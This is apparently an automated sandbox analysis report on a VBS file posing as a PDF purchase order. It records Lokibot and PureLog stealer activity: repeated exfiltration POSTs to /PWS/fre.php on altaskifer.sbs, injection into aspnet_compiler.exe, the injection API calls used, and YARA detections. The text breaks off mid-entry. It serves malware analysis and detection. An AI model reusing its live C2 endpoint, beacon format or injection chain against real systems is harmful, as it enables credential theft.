Apr 6, 2024 09:31:20.261132956 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:20.636603117 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NDJQoLlFI139OnCbYIj8B3JbJHEiByhI%2BhT%2B01r8gyMYFehzfbUR6BLVS5q8TPVBlKdnJsO1F8FPTd0abZcgSDUB413SJIzO7%2BzhBB2wo5XrTtTj79%2F372sJbux5NC%2F1BA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013e33808741e-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.6	49867	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:20.907030106 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:21.031291008 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:21.399348974 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5N9ZuxSo5ETztlAp8mlCNp4Ybpa%2Fuhc3lAHjXc7KKIuvL8%2FqmZqkf8qfQ5%2Fz84CJJetmhTOs%2FYhHZh9nHAeamVn%2BwkDAd1sV2VZNUEiASH5TqNAAyTskIhfk4VoT9dwTFw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013e81cfa6dad-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.6	49868	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:21.669303894 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:21.794157028 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:22.172482014 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rH5IKNnUHnByPE%2BNARCr3wPIOBqalodlIOchukprOydgmgF5oKtQm191Q4T3LgBd679fyk8QDe811q2WlR%2BVPMqrF%2Fro4AwXE3A1hgYra%2FrexvUSL4%2Bhpmgi25HZva14yQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013ecdd9c8da3-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.6	49869	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:22.429105997 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:22.552946091 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:22.932873011 CEST	599	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jnEq6ZldLDpSAR6XYw60JSAuccC7iwsTKhGa9cZtjOgdBlQ5zlFQ5MNU3LPqruMzwPFvJWAJxI%2FYMGbDq44LQfoyfQmv%2FVlL54QdKbQesUsCT3Opou56p6PmeDOU7mIIIg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013f19d3431e6-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.6	49870	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:23.194950104 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:23.319766045 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:23.701543093 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O1c8ZWHOxB06v96hAqsl%2BSmXf%2FKJMlT%2FBxGKTj4bjA2GVREmkTQzidLNHKt68i%2B4OKPFW4MWG1IkYjxz2dmP2MvTpZNnM55VAPcIzbUDVSl63GNZnARqMHR2OyDbwhi4Pw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013f658ca8dc6-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.6	49871	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:23.961991072 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:24.086267948 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:24.470716000 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ptkxQNQOtr9ciCgNB83eUiTr5xOm3WdMsRhTrFHpCSHS6OXhp1WjiOiB2SzVW17wDG1K4rgg2qRwn9cRYgdxNYS2%2Bi4o%2ByMMblrnc7lD5DStOcTF%2F%2FgJKGCfD22z8bC13w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013fb2e918dae-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.6	49872	172.67.148.126	80

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:24.825006962 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:24.948584080 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:25.328350067 CEST	595	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7fbFCgsAg4dSvBXbBxyxy2Qcq2C2v8J0yMPFh5jm5XfyD0NJqef9ZyFKJYA6XUeOnd4iwwuKUn6v6DtUfGfxjik2sRpqErL8ZKc23IpSIMl8lYDwVzSCaalt8N0zmVDCMg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870014008a646dce-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Target ID:	0
Start time:	09:29:15
Start date:	06/04/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs"
Imagebase:	0x7ff6bd020000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2257758604.000001A474030000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2249190359.000001A4732E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2249613824.000001A473A21000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2252966243.000001A4735D6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:29:19
Start date:	06/04/2024
Path:	C:\Users\user\AppData\Local\Temp\x.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase:	0x70000
File size:	309'760 bytes
MD5 hash:	F5259113B28AA9CB170D1D4C7003F79F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000000.2248791752.0000000000072000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs Detection: 40%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:29:21
Start date:	06/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0x80000
File size:	56'368 bytes
MD5 hash:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:29:21
Start date:	06/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0x550000
File size:	56'368 bytes
MD5 hash:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000004.00000002.3494407989.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	15.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.4%
Total number of Nodes:	88
Total number of Limit Nodes:	3

Executed Functions

Function 0495ACA0 Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 0495AD2E

Memory Dump Source

Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4950000_x.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 3f7d1538fe4ba9c4709e83f5584343c740eed802d6a410ac7087c804ddf0ceda
Instruction ID: 62271845398861ad96b2fe4e15332db195415a151c51a3c87dec111b168042da
Opcode Fuzzy Hash: 3f7d1538fe4ba9c4709e83f5584343c740eed802d6a410ac7087c804ddf0ceda
Instruction Fuzzy Hash: 9531A9B4D012189FDB10DFA9D980A9EFBF5BF49310F20942AE814B7210D775A945CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0495D040 Relevance: 1.7, APIs: 1, Instructions: 236
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0495D21F

Memory Dump Source

Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4950000_x.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d9aca64f9bfd26e12ef583f4e70834db4a492d517211165496a33be93b79e678
Instruction ID: 9a3150e386ed9c0b89dfb0194cf6f4d1437b7cefc8d352e2ddda24c8b6ec2339
Opcode Fuzzy Hash: d9aca64f9bfd26e12ef583f4e70834db4a492d517211165496a33be93b79e678
Instruction Fuzzy Hash: 6781BE74C0022D9FDB25CFA9D880BDDBBF5AB49304F1094AAE548B7220DB74AA85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0070DB40 Relevance: 1.6, APIs: 1, Instructions: 112
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 0070DC49

Memory Dump Source

Source File: 00000002.00000002.2277097619.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_700000_x.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 444b991527982a27d0cb636477bb46abe1b1f4115976120fa15febcd2280bb62
Instruction ID: 8a5aefe22564cad0cb886fb4cc5ff83211cb15f2454a9c106b91fdbd5ec2c8b1
Opcode Fuzzy Hash: 444b991527982a27d0cb636477bb46abe1b1f4115976120fa15febcd2280bb62
Instruction Fuzzy Hash: 2141F0B4D00358CFEB20CFE9D98579EBBF1BB49304F109129E814AB291D7B89845CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0495D710 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0495D7DE

Memory Dump Source

Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4950000_x.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b68e4e3deefd9f12193e98aee90aee1c331ecc533812896fd0aba8383723d58c
Instruction ID: 651215aaf0c470dd34761939f1fe9957ccd2f2ed2774c105885f68493109a7c5
Opcode Fuzzy Hash: b68e4e3deefd9f12193e98aee90aee1c331ecc533812896fd0aba8383723d58c
Instruction Fuzzy Hash: 524168B9D002599FCF10CFA9D984ADEFBF5BB49310F24902AE918B7210D375AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0070DEB8 Relevance: 1.6, APIs: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0070DF5C

Memory Dump Source

Source File: 00000002.00000002.2277097619.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_700000_x.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8c3035dfc9256a9899b2bdf3ed97710b81941eefb79ee89aa4be7e09a546a474
Instruction ID: 6f84d7c9b3a30e74d6baddc5752871c2b527828357c5006396dd3c74ee77f44e
Opcode Fuzzy Hash: 8c3035dfc9256a9899b2bdf3ed97710b81941eefb79ee89aa4be7e09a546a474
Instruction Fuzzy Hash: 2E31A8B4D012499FDB10CFA9D980A9EFBB0BB49310F24902AE819B7210D735A945CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0495D5D0 Relevance: 1.6, APIs: 1, Instructions: 95
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0495D675

Memory Dump Source

Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4950000_x.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 49f1d146d9dddea9985e66473e0e4c4253e1f7283fd1318b063ec58b42968057
Instruction ID: 8a727c5a6df25a6e3d9971a85b0964737322f7a4effb712f0cdffbacd10f7421
Opcode Fuzzy Hash: 49f1d146d9dddea9985e66473e0e4c4253e1f7283fd1318b063ec58b42968057
Instruction Fuzzy Hash: 733156B9D052589FCF10CFA9D984A9EFBB5BB19310F20A02AE818B7310D335A945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0495D378 Relevance: 1.6, APIs: 1, Instructions: 88
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0495D422

Memory Dump Source

Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4950000_x.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 617d5d3774a33030e655400c5d28e5db801b583e396fcfebfecc3c25481fb162
Instruction ID: 1481864bf5f69bec02fb68cafe1637cdcfd23ed95c720ec6012ae096eb5272aa
Opcode Fuzzy Hash: 617d5d3774a33030e655400c5d28e5db801b583e396fcfebfecc3c25481fb162
Instruction Fuzzy Hash: 573199B5D012589FCB10CFAAD984ADEFBF5BB49314F24902AE818B7350D378A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0495B0E0 Relevance: 1.6, APIs: 1, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumWindows.USER32(?,?), ref: 0495B179

Memory Dump Source

Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4950000_x.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: e36ed2475ab28edab88bb2211d46b0f82216cc09ced3afd0e05b94bb63ec436c
Instruction ID: c5243542a3e2e3fb799970a662fbd41fb22e985206169b0e596eba2d3b2d5bfe
Opcode Fuzzy Hash: e36ed2475ab28edab88bb2211d46b0f82216cc09ced3afd0e05b94bb63ec436c
Instruction Fuzzy Hash: D031C8B4D0121D9FDB14DFA9D984AEEFBB5BF89310F20942AE805B7210C735A941CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0495ADD0 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 0495AE4E

Memory Dump Source

Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4950000_x.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 6d5e1a5297b18bd60981a7f05684f23594f77f0d74d9d8ce3b074c96eb7c7275
Instruction ID: 75ff9e3b0eac94ab35420e0ddd14e5dfd99442c2da9af559272f832f3e2e57c3
Opcode Fuzzy Hash: 6d5e1a5297b18bd60981a7f05684f23594f77f0d74d9d8ce3b074c96eb7c7275
Instruction Fuzzy Hash: 7D219BB4D002189FDF10CFA9E584ADEFBF4AB49310F20902AE818B7310D335A945CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0495D8D0 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 0495D946

Memory Dump Source

